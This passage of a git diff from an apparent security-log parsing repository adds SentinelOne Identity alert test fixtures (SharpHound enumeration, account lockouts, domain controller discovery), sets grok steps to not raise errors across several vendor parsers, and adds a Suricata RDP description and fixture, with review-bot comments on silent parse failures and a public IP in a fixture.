+ "start": "2024-11-22T08:45:50Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:50Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-dc47-75de-8925-5f026bd5a705", + "name": "LDAP Search Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_3.json b/SentinelOne/identity/tests/test_alert_3.json new file mode 100644 index 000000000..cbc475032 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_3.json 
@@ -0,0 +1,34 @@ +{ + "input": { + "message": "{\"id\": \"01935359-3eda-7903-93fc-af6a0e5d0a8f\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:37.779Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:37.779Z\", \"lastSeenAt\": \"2024-11-22T10:09:37.779Z\", \"process\": null, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935359-3eda-7903-93fc-af6a0e5d0a8f\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:37.779Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:37.779Z\", \"lastSeenAt\": \"2024-11-22T10:09:37.779Z\", \"process\": null, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T10:09:37.779000Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.", + "start": "2024-11-22T10:09:37.779000Z", + "type": "info" + }, + "@timestamp": "2024-11-22T10:09:37.779000Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": 
"UNKNOWN", + "confidenceLevel": "MALICIOUS", + "id": "01935359-3eda-7903-93fc-af6a0e5d0a8f", + "name": "Brute force attack - Mass Account Lockout", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_4.json b/SentinelOne/identity/tests/test_alert_4.json new file mode 100644 index 000000000..64efcfc10 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_4.json 
@@ -0,0 +1,34 @@ +{ + "input": { + "message": "{\"id\": \"01935358-ee81-7eb7-b57f-022c6f0019a9\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:17.184Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:17.184Z\", \"lastSeenAt\": \"2024-11-22T10:09:17.184Z\", \"process\": null, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935358-ee81-7eb7-b57f-022c6f0019a9\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:17.184Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:17.184Z\", \"lastSeenAt\": \"2024-11-22T10:09:17.184Z\", \"process\": null, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T10:09:17.184000Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.", + "start": "2024-11-22T10:09:17.184000Z", + "type": "info" + }, + "@timestamp": "2024-11-22T10:09:17.184000Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": 
"UNKNOWN", + "confidenceLevel": "MALICIOUS", + "id": "01935358-ee81-7eb7-b57f-022c6f0019a9", + "name": "Brute force attack - Mass Account Lockout", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_5.json b/SentinelOne/identity/tests/test_alert_5.json new file mode 100644 index 000000000..6e14dbe24 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_5.json 
@@ -0,0 +1,47 @@ +{ + "input": { + "message": "{\"id\": \"0193534d-63c1-7497-b854-b883425af3f5\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:54:58.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:54:58.000Z\", \"lastSeenAt\": \"2024-11-22T09:54:58.000Z\", \"process\": {\"cmdLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\", \"file\": {\"path\": \"c:\\\\windows\\\\system32\\\\cmd.exe\", \"sha1\": null, \"sha256\": \"4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"0193534d-63c1-7497-b854-b883425af3f5\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:54:58.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:54:58.000Z\", \"lastSeenAt\": \"2024-11-22T09:54:58.000Z\", \"process\": {\"cmdLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\", \"file\": {\"path\": \"c:\\\\windows\\\\system32\\\\cmd.exe\", \"sha1\": null, \"sha256\": \"4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": 
"2024-11-22T09:54:58Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.", + "start": "2024-11-22T09:54:58Z", + "type": "info" + }, + "@timestamp": "2024-11-22T09:54:58Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "\"C:\\Windows\\system32\\cmd.exe\"", + "executable": "c:\\windows\\system32\\cmd.exe", + "hash": { + "sha256": "4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22" + }, + "name": "cmd.exe" + }, + "related": { + "hash": [ + "4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "0193534d-63c1-7497-b854-b883425af3f5", + "name": "Domain Controller Discovery Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_6.json b/SentinelOne/identity/tests/test_alert_6.json new file mode 100644 index 000000000..5b987ddc2 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_6.json 
@@ -0,0 +1,47 @@ +{ + "input": { + "message": "{\"id\": \"01935347-abf7-7457-8467-e3443470e6f3\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935347-abf7-7457-8467-e3443470e6f3\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T09:45:51Z", + "kind": "alert", 
+ "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.", + "start": "2024-11-22T09:45:51Z", + "type": "info" + }, + "@timestamp": "2024-11-22T09:45:51Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935347-abf7-7457-8467-e3443470e6f3", + "name": "AD Domain Computer Enumeration Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_7.json b/SentinelOne/identity/tests/test_alert_7.json new file mode 100644 index 000000000..6fc5195cb --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_7.json 
@@ -0,0 +1,47 @@ +{ + "input": { + "message": "{\"id\": \"01935347-b05a-7d28-a929-5294ee16628a\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935347-b05a-7d28-a929-5294ee16628a\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": 
"2024-11-22T09:45:51Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.", + "start": "2024-11-22T09:45:51Z", + "type": "info" + }, + "@timestamp": "2024-11-22T09:45:51Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935347-b05a-7d28-a929-5294ee16628a", + "name": "Domain Controller Discovery Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_8.json b/SentinelOne/identity/tests/test_alert_8.json new file mode 100644 index 000000000..384a41648 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_8.json 
@@ -0,0 +1,34 @@ +{ + "input": { + "message": "{\"id\": \"01935342-d073-7ed0-8c5e-2373fc013310\", \"name\": \"Default Admin Account Usage\", \"description\": \"This event is raised for default administrator account logon anywhere in the domain.\", \"detectedAt\": \"2024-11-22T09:45:07.655Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:07.655Z\", \"lastSeenAt\": \"2024-11-22T09:45:07.655Z\", \"process\": null, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935342-d073-7ed0-8c5e-2373fc013310\", \"name\": \"Default Admin Account Usage\", \"description\": \"This event is raised for default administrator account logon anywhere in the domain.\", \"detectedAt\": \"2024-11-22T09:45:07.655Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:07.655Z\", \"lastSeenAt\": \"2024-11-22T09:45:07.655Z\", \"process\": null, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T09:45:07.655000Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised for default administrator account logon anywhere in the domain.", + "start": "2024-11-22T09:45:07.655000Z", + "type": "info" + }, + "@timestamp": "2024-11-22T09:45:07.655000Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "UNKNOWN", + "confidenceLevel": "MALICIOUS", + "id": "01935342-d073-7ed0-8c5e-2373fc013310", + "name": "Default Admin Account Usage", + "status": "NEW" + } + } + } +} \ No newline at end of file 
diff --git a/SentinelOne/identity/tests/test_alert_9.json b/SentinelOne/identity/tests/test_alert_9.json
new file mode 100644
index 000000000..74ab3a7f3
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_9.json
@@ -0,0 +1,34 @@ +{ + "input": { + "message": "{\"id\": \"01935322-cc3a-76cc-890b-a1c2d1b815d4\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:10:09.467Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:10:09.467Z\", \"lastSeenAt\": \"2024-11-22T09:10:09.467Z\", \"process\": null, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935322-cc3a-76cc-890b-a1c2d1b815d4\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:10:09.467Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:10:09.467Z\", \"lastSeenAt\": \"2024-11-22T09:10:09.467Z\", \"process\": null, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T09:10:09.467000Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.", + "start": "2024-11-22T09:10:09.467000Z", + "type": "info" + }, + "@timestamp": "2024-11-22T09:10:09.467000Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": 
"UNKNOWN",
+ "confidenceLevel": "MALICIOUS",
+ "id": "01935322-cc3a-76cc-890b-a1c2d1b815d4",
+ "name": "Brute force attack - Mass Account Lockout",
+ "status": "NEW"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml b/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml
index 9fc2ec259..20b07e5f4 100644
--- a/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml
+++ b/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml
@@ -28,6 +28,7 @@ pipeline:
 external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: "{{parse_kv.message.http_request_first_line}}"
 output_field: message
 pattern: "%{WORD:http_method} %{URL:url} HTTP/%{NUMBER:http_version}"
diff --git a/SonicWall/sonicwall-fw/ingest/parser.yml b/SonicWall/sonicwall-fw/ingest/parser.yml
index 8a913cd4e..03aa0ed21 100644
--- a/SonicWall/sonicwall-fw/ingest/parser.yml
+++ b/SonicWall/sonicwall-fw/ingest/parser.yml
@@ -35,6 +35,7 @@ pipeline:
 external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: "{{parsed_event.message.susr}}"
 output_field: result
 pattern: "(%{USER_WITH_DOMAIN}|%{GREEDYDATA:user_name})"
@@ -47,6 +48,7 @@ pipeline:
 external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: "{{parsed_event.message.msg}}"
 output_field: result
 pattern: "(%{GREEDYDATA}[F|f]ilename: %{FILE:filename}%{GREEDYDATA})"
diff --git a/Sophos/sophos edr/ingest/parser.yml b/Sophos/sophos edr/ingest/parser.yml
index f7dc22739..c4779fa3f 100644
--- a/Sophos/sophos edr/ingest/parser.yml
+++ b/Sophos/sophos edr/ingest/parser.yml
@@ -9,6 +9,7 @@ pipeline:
 - external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: "{{parse_json.message.name}}"
 output_field: message
 pattern: 'Access was blocked to "%{URL:url}" because of "%{WORD:rulename}".'
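Review bot: With `raise_errors: false` a grok mismatch on `parse_kv.message.http_request_first_line` no longer fails the event; the `message` output and its `http_method`, `url` and `http_version` captures are presumably just left unset, and the hunk does not show whether later stages read them unconditionally. The same point applies to the SonicWall hunks at `@@ -35` and `@@ -47`, the five Sophos EDR hunks and the Squid hunk at `@@ -48`. A fixture per parser whose input does not match the pattern, asserting the event is still emitted without the grok-derived fields, would turn a silent parse failure into a test result rather than a gap in the data that nobody notices. A short comment above the new key, `# a non-matching input is not an error; the output field stays unset`, would record the intended degradation.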
@@ -19,6 +20,7 @@ pipeline:
 - external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: "{{parse_json.message.name}}"
 output_field: message
 pattern: "Controlled application %{WORD}: %{GREEDYDATA:process_title}"
@@ -27,6 +29,7 @@ pipeline:
 - external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: "{{parse_json.message.name}}"
 output_field: message
 pattern: "%{REMOVABLE_STORAGE}|%{STORAGE}"
@@ -38,6 +41,7 @@ pipeline:
 - external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: "{{parse_json.message.name}}"
 output_field: message
 pattern: "PUA %{GREEDYDATA:action}: '%{GREEDYDATA:threat}' at '%{GREEDYDATA:file_path}'"
@@ -46,6 +50,7 @@ pipeline:
 - external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: "{{parse_json.message.name}}"
 output_field: message
 pattern: "'%{GREEDYDATA:threat}' exploit prevented in %{GREEDYDATA:category}"
diff --git a/Squid/squid/ingest/parser.yml b/Squid/squid/ingest/parser.yml
index f5b9de6f9..14c43d5d1 100644
--- a/Squid/squid/ingest/parser.yml
+++ b/Squid/squid/ingest/parser.yml
@@ -48,6 +48,7 @@ pipeline:
 external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: parsed_event.message.url
 output_field: message
 pattern: "(%{IP:ip}|%{NOTSPACE:domain}):%{NUMBER:port}"
diff --git a/Suricata/suricata/_meta/smart-descriptions.json b/Suricata/suricata/_meta/smart-descriptions.json
index fc89638e0..432cf533d 100644
--- a/Suricata/suricata/_meta/smart-descriptions.json
+++ b/Suricata/suricata/_meta/smart-descriptions.json
@@ -151,8 +151,7 @@
 "value": "query"
 },
 {
- "field": "action.type",
- "value": "dns"
+ "field": "dns.question.name"
 }
 ],
 "relationships": [
@@ -198,6 +197,22 @@
 }
 ]
 },
+ {
+ "value": "RDP traffic from {source.ip} to {destination.ip}",
+ "conditions": [
+ {
+ "field": "action.type",
+ "value": "rdp"
+ }
+ ],
+ "relationships": [
+ {
+ "source": "source.ip",
+ "target": "destination.ip",
+ "type": "requested"
+ }
+ ]
+ },
 {
 "value": "Traffic flow from {source.ip} with {user_agent.original} to {destination.ip} with {http.request.method} request to {url.original}",
 "conditions": [
diff --git a/Suricata/suricata/tests/rdp.json b/Suricata/suricata/tests/rdp.json
new file mode 100644
index 000000000..131dd7025
--- /dev/null
+++ b/Suricata/suricata/tests/rdp.json
@@ -0,0 +1,57 @@
+{
+ "input": {
+ "message": "{\"timestamp\":\"2024-11-29T15:08:06.239558+0000\",\"flow_id\":1822723333770346,\"in_iface\":\"eth0\",\"event_type\":\"rdp\",\"src_ip\":\"14.225.46.243\",\"src_port\":58953,\"dest_ip\":\"10.0.1.4\",\"dest_port\":3389,\"proto\":\"TCP\",\"community_id\":\"1:kyALzWxuJ/ruPpAqvO4KTLSsEaQ=\",\"rdp\":{\"tx_id\":2,\"event_type\":\"tls_handshake\",\"x509_serials\":[\"773dbe1ea6dc998444b4f9da1f188ba8\"]}}",
+ "sekoiaio": {
+ "intake": {
+ "dialect": "Suricata",
+ "dialect_uuid": "331fa58d-8cf9-454a-a87f-48a3dc07d4d3"
+ }
+ }
+ },
+ "expected": {
+ "message": "{\"timestamp\":\"2024-11-29T15:08:06.239558+0000\",\"flow_id\":1822723333770346,\"in_iface\":\"eth0\",\"event_type\":\"rdp\",\"src_ip\":\"14.225.46.243\",\"src_port\":58953,\"dest_ip\":\"10.0.1.4\",\"dest_port\":3389,\"proto\":\"TCP\",\"community_id\":\"1:kyALzWxuJ/ruPpAqvO4KTLSsEaQ=\",\"rdp\":{\"tx_id\":2,\"event_type\":\"tls_handshake\",\"x509_serials\":[\"773dbe1ea6dc998444b4f9da1f188ba8\"]}}",
+ "event": {
+ "category": [
+ "network"
+ ],
+ "type": [
+ "connection"
+ ]
+ },
+ "@timestamp": "2024-11-29T15:08:06.239558Z",
+ "action": {
+ "type": "rdp"
+ },
+ "destination": {
+ "address": "10.0.1.4",
+ "ip": "10.0.1.4",
+ "port": 3389
+ },
+ "host": {
+ "ip": "14.225.46.243"
+ },
+ "network": {
+ "community_id": "1:kyALzWxuJ/ruPpAqvO4KTLSsEaQ=",
+ "protocol": "TCP",
+ "transport": "TCP"
+ },
+ "observer": {
+ "ingress": {
+ "interface": {
+ "name": "eth0"
+ }
+ }
+ },
+ "related": {
+ "ip": [
+ "10.0.1.4",
+ "14.225.46.243"
+ ]
+ },
+ "source": {
+ "address": "14.225.46.243",
+ "ip": "14.225.46.243",
+ "port": 58953
+ }
+ }
+}
\ No newline at end of file
diff --git a/Systancia/cleanroom/ingest/parser.yml b/Systancia/cleanroom/ingest/parser.yml
index 0b80ff87c..44342010b 100644
--- a/Systancia/cleanroom/ingest/parser.yml
+++ b/Systancia/cleanroom/ingest/parser.yml
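Review bot: The expected output pins `host.ip` to `14.225.46.243`, which in this event is the remote `src_ip` of an inbound connection to `10.0.1.4:3389`; if that is how the parser fills `host.ip` for every event type it is outside this commit, but for inbound RDP it attributes the connecting client to the observing host, so it is worth confirming before the fixture locks it in. Separately, the fixture carries what looks like a routable public address in `message`, `host.ip`, `related.ip` and `source`, while the Tenable fixtures in the same commit are being scrubbed of tenant-specific values; an RFC 5737 documentation address (for example `203.0.113.10`, a constructed value) in all four places keeps the fixture free of a real third-party IP.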
@@ -16,6 +16,7 @@ pipeline:
 external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: "{{event.result.event_reason}}"
 output_field: result
 pattern: "%{SESSION_SUCCESS}|%{SESSION_FAILURE}|%{PROCESS}"
diff --git a/Tehtris/tehtris-edr/ingest/parser.yml b/Tehtris/tehtris-edr/ingest/parser.yml
index cbcb244bb..aa8f22411 100644
--- a/Tehtris/tehtris-edr/ingest/parser.yml
+++ b/Tehtris/tehtris-edr/ingest/parser.yml
@@ -23,6 +23,7 @@ pipeline:
 external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: "{{json_event.message.description}}"
 pattern: "(%{APPLICATION_POLICY}|%{URL_DETECTED}|%{MALICIOUS_MACRO})"
 custom_patterns:
diff --git a/Tenable/alsid/tests/alert_gpo_exec.json b/Tenable/alsid/tests/alert_gpo_exec.json
index fd44a4363..f55ff40bf 100644
--- a/Tenable/alsid/tests/alert_gpo_exec.json
+++ b/Tenable/alsid/tests/alert_gpo_exec.json
